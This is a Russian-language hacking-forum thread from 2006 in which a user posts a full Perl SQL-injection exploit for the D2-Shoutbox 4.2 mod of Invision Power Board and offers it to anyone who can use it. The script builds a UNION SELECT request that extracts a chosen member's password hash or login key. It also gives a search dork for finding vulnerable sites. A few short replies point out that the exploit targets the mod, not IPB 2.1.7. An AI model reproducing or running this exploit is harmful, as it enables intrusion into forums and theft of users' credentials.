Exploit для IPB 2.1.7

Discussion in 'Болталка' started by samurays, 7 Sep 2006.

  1. samurays

    samurays New Member

    Joined:
    11 Jul 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Вот насшёл експлоит, но он у меня не работает, наверное там где мне надо его прменить нет этого модуля, D2-Shoutbox.
    Может кому пригодится.

    #!/usr/bin/perl
    #########################################################
    # _______ _______ ______ #
    # |______ |______ | \ #
    # ______| |______ |_____/ #
    # #
    #D2-Shoutbox 4.2(IPB Mod)<=SQL injection #
    #Created By SkOd #
    #SED security Team #
    #http://www.sed-team.be #
    #[email protected] #
    #ISRAEL #
    #########################################################
    #google:
    #"Powered By D2-Shoutbox 4.2"
    #########################################################
    use IO::Socket;
    $host = $ARGV[0];
    $user = $ARGV[2];
    $uid = $ARGV[3];
    $pid = $ARGV[4];
    $type = $ARGV[5];

    sub type()
    {
    if($type==1){$row="password";}
    if($type==2){$row="member_login_key";}
    else{print "Just 1 Or 2\n";exit();}
    $sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
    $path = $ARGV[1].$sql;
    }


    sub header()
    {
    print q{
    #######################################################################
    ### D2-Shoutbox 4.2 SQL injection Exploit ###
    ### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
    ### Created By SkOd, Sed Security Team ###
    #######################################################################
    sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
    sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
    #######################################################################
    }
    }

    sub sedsock()
    {
    $sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr
    => $host, PeerPort => "80") || die "[-]Connect
    Failed\r\n";
    print $sedsock "GET $path HTTP/1.1\n";
    print $sedsock "Host: $host\n";
    print $sedsock "Accept: */*\n";
    print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
    print $sedsock "Connection: close\n\n";
    while($res = <$sedsock>){
    $res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User:
    $user\n[+]Md5 Hash: $1\n";
    }
    }

    if(@ARGV < 6){
    header();
    }else{
    type();
    sedsock();
    }
    #securitydot.net - 2006-03-06

    http://securitydot.net
     
    #1 samurays, 7 Sep 2006
  2. SladerNon

    SladerNon Адам

    Joined:
    6 Mar 2005
    Messages:
    1,636
    Likes Received:
    938
    Reputations:
    355
    #securitydot.net - 2006-03-06

    Тебя наверно даже дата не смутила? )
     
    #2 SladerNon, 7 Sep 2006
    Last edited: 7 Sep 2006
  3. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Это ваще эксплоит не под 2.1.7! Короче нефига он сделать неможет этот эсплоит!
     
    #3 ~Real F@ck!~, 7 Sep 2006
  4. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    учимся читать =) D2-Shoutbox 4.2(IPB Mod)<=SQL injection
     
    #4 darky, 7 Sep 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.